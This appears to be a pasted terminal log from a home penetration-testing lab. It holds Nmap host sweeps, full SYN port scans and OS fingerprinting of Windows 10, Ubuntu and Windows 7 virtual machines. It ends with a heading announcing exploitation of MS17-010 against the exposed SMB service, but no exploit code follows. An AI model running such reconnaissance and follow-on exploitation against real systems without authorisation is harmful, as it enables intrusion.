Nmap scan report for 10.211.55.74Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.74 are filtered
Nmap scan report for 10.211.55.75Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.75 are filtered
Nmap scan report for 10.211.55.76Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.76 are filtered
Nmap scan report for 10.211.55.77Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.77 are filtered
Nmap scan report for 10.211.55.78Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.78 are filtered
Nmap scan report for 10.211.55.79Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.79 are filtered
Nmap scan report for 10.211.55.80Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.80 are filtered
Nmap scan report for 10.211.55.81Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.81 are filtered
Nmap scan report for 10.211.55.82Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.82 are filtered
Nmap scan report for 10.211.55.83Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.83 are filtered
Nmap scan report for 10.211.55.84Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.84 are filtered
Nmap scan report for 10.211.55.85Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.85 are filtered
Nmap scan report for 10.211.55.86Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.86 are filtered
Nmap scan report for 10.211.55.87Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.87 are filtered
Nmap scan report for 10.211.55.88Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.88 are filtered
Nmap scan report for 10.211.55.89Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.89 are filtered
Nmap scan report for 10.211.55.90Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.90 are filtered
Nmap scan report for 10.211.55.91Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.91 are filtered
Nmap scan report for 10.211.55.92Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.92 are filtered
Nmap scan report for 10.211.55.93Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.93 are filtered
Nmap scan report for 10.211.55.94Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.94 are filtered
Nmap scan report for 10.211.55.95Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.95 are filtered
Nmap scan report for 10.211.55.96Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.96 are filtered
Nmap scan report for 10.211.55.97Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.97 are filtered
Nmap scan report for 10.211.55.98Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.98 are filtered
Nmap scan report for 10.211.55.99Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.99 are filtered
Nmap scan report for 10.211.55.100Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.100 are filtered
Nmap scan report for 10.211.55.101Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.101 are filtered
Nmap scan report for 10.211.55.102Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.102 are filtered
Nmap scan report for 10.211.55.103Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.103 are filtered
Nmap scan report for 10.211.55.104Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.104 are filtered
Nmap scan report for 10.211.55.105Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.105 are filtered
Nmap scan report for 10.211.55.106Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.106 are filtered
Nmap scan report for 10.211.55.107Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.107 are filtered
Nmap scan report for 10.211.55.108Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.108 are filtered
Nmap scan report for 10.211.55.109Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.109 are filtered
Nmap scan report for 10.211.55.110Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.110 are filtered
Nmap scan report for 10.211.55.111Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.111 are filtered
Nmap scan report for 10.211.55.112Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.112 are filtered
Nmap scan report for 10.211.55.113Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.113 are filtered
Nmap scan report for 10.211.55.114Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.114 are filtered
Nmap scan report for 10.211.55.115Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.115 are filtered
Nmap scan report for 10.211.55.116Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.116 are filtered
Nmap scan report for 10.211.55.117Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.117 are filtered
Nmap scan report for 10.211.55.118Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.118 are filtered
Nmap scan report for 10.211.55.119Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.119 are filtered
Nmap scan report for 10.211.55.120Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.120 are filtered
Nmap scan report for 10.211.55.121Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.121 are filtered
Nmap scan report for 10.211.55.122Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.122 are filtered
Nmap scan report for 10.211.55.123Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.123 are filtered
Nmap scan report for 10.211.55.124Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.124 are filtered
Nmap scan report for 10.211.55.125Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.125 are filtered
Nmap scan report for 10.211.55.126Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.126 are filtered
Nmap scan report for 10.211.55.127Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.127 are filtered
Nmap scan report for 10.211.55.128Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.128 are filtered
Nmap scan report for 10.211.55.129Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.129 are filtered
Nmap scan report for 10.211.55.130Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.130 are filtered
Nmap scan report for 10.211.55.131Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.131 are filtered
Nmap scan report for 10.211.55.132Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.132 are filtered
Nmap scan report for 10.211.55.133Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.133 are filtered
Nmap scan report for 10.211.55.134Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.134 are filtered
Nmap scan report for 10.211.55.135Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.135 are filtered
Nmap scan report for 10.211.55.136Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.136 are filtered
Nmap scan report for 10.211.55.137Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.137 are filtered
Nmap scan report for 10.211.55.138Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.138 are filtered
Nmap scan report for 10.211.55.139Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.139 are filtered
Nmap scan report for 10.211.55.140Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.140 are filtered
Nmap scan report for 10.211.55.141Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.141 are filtered
Nmap scan report for 10.211.55.142Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.142 are filtered
Nmap scan report for 10.211.55.143Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.143 are filtered
Nmap scan report for 10.211.55.144Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.144 are filtered
Nmap scan report for 10.211.55.145Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.145 are filtered
Nmap scan report for 10.211.55.146Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.146 are filtered
Nmap scan report for 10.211.55.147Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.147 are filtered
Nmap scan report for 10.211.55.148Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.148 are filtered
Nmap scan report for 10.211.55.149Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.149 are filtered
Nmap scan report for 10.211.55.150Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.150 are filtered
Nmap scan report for 10.211.55.151Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.151 are filtered
Nmap scan report for 10.211.55.152Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.152 are filtered
Nmap scan report for 10.211.55.153Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.153 are filtered
Nmap scan report for 10.211.55.154Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.154 are filtered
Nmap scan report for 10.211.55.155Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.155 are filtered
Nmap scan report for 10.211.55.156Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.156 are filtered
Nmap scan report for 10.211.55.157Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.157 are filtered
Nmap scan report for 10.211.55.158Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.158 are filtered
Nmap scan report for 10.211.55.159Host is up (0.000029s latency).All 1000 scanned ports on 10.211.55.159 are filtered
Nmap scan report for 10.211.55.160Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.160 are filtered
Nmap scan report for 10.211.55.161Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.161 are filtered
Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds(base) ➜ ~ (base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CSTInitiating ARP Ping Scan at 19:37Scanning 10.211.55.5 [1 port]Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:37Scanning windows-10.shared (10.211.55.5) [65535 ports]Discovered open port 135/tcp on 10.211.55.5Discovered open port 139/tcp on 10.211.55.5Discovered open port 445/tcp on 10.211.55.5Discovered open port 49664/tcp on 10.211.55.5Discovered open port 49669/tcp on 10.211.55.5Discovered open port 5040/tcp on 10.211.55.5Discovered open port 49667/tcp on 10.211.55.5Discovered open port 49668/tcp on 10.211.55.5Discovered open port 49665/tcp on 10.211.55.5Discovered open port 49671/tcp on 10.211.55.5Discovered open port 49666/tcp on 10.211.55.5Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)Nmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00018s latency).Not shown: 65524 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds5040/tcp open unknown49664/tcp open unknown49665/tcp open unknown49666/tcp open unknown49667/tcp open unknown49668/tcp open unknown49669/tcp open unknown49671/tcp open unknownMAC Address: 00:1C:42:F4:4F:FE (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 41.79 seconds Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)(base) ➜ ~ nmap -O 10.211.55.5TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ nmap -Pn -O 10.211.55.5TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ sudo nmap -O 10.211.55.5Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CSTNmap scan report for windows-10.shared (10.211.55.5)Host is up (0.00022s latency).Not shown: 997 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 00:1C:42:F4:4F:FE (Parallels)Device type: general purposeRunning (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CSTInitiating ARP Ping Scan at 19:41Scanning 10.211.55.6 [1 port]Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:41Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]Discovered open port 22/tcp on 10.211.55.6Discovered open port 61616/tcp on 10.211.55.6Discovered open port 8161/tcp on 10.211.55.6Discovered open port 8088/tcp on 10.211.55.6Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.000046s latency).Not shown: 65531 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-http8161/tcp open patrol-snmp61616/tcp open unknownMAC Address: 00:1C:42:B7:60:2B (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 0.61 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)(base) ➜ ~ sudo nmap -O 10.211.55.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (0.00019s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh8088/tcp open radan-httpMAC Address: 00:1C:42:B7:60:2B (Parallels)No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TMOS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=ZOS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FEOS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%OOS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%QOS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=YOS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CSTInitiating ARP Ping Scan at 19:43Scanning 10.211.55.8 [1 port]Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)Initiating SYN Stealth Scan at 19:43Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]Discovered open port 445/tcp on 10.211.55.8Discovered open port 135/tcp on 10.211.55.8Discovered open port 139/tcp on 10.211.55.8Discovered open port 49157/tcp on 10.211.55.8Discovered open port 49156/tcp on 10.211.55.8Discovered open port 49153/tcp on 10.211.55.8Discovered open port 49155/tcp on 10.211.55.8Discovered open port 49154/tcp on 10.211.55.8Discovered open port 49152/tcp on 10.211.55.8Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)Nmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00010s latency).Not shown: 65526 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)
Read data files from: /usr/local/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in 40.63 seconds Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)(base) ➜ ~ sudo nmap -O 10.211.55.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00017s latency).Not shown: 991 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds(base) ➜ ~ nmap -O 10.211.55.8TCP/IP fingerprinting (for OS scan) requires root privileges.QUITTING!(base) ➜ ~ sudo nmap -O 10.211.55.8Password:Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CSTNmap scan report for windows-7sp1.shared (10.211.55.8)Host is up (0.00018s latency).Not shown: 990 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds3389/tcp open ms-wbt-server49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49156/tcp open unknown49157/tcp open unknownMAC Address: 00:1C:42:B2:9C:23 (Parallels)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds(base) ➜ ~ 

漏洞利用-Windows MS17-010

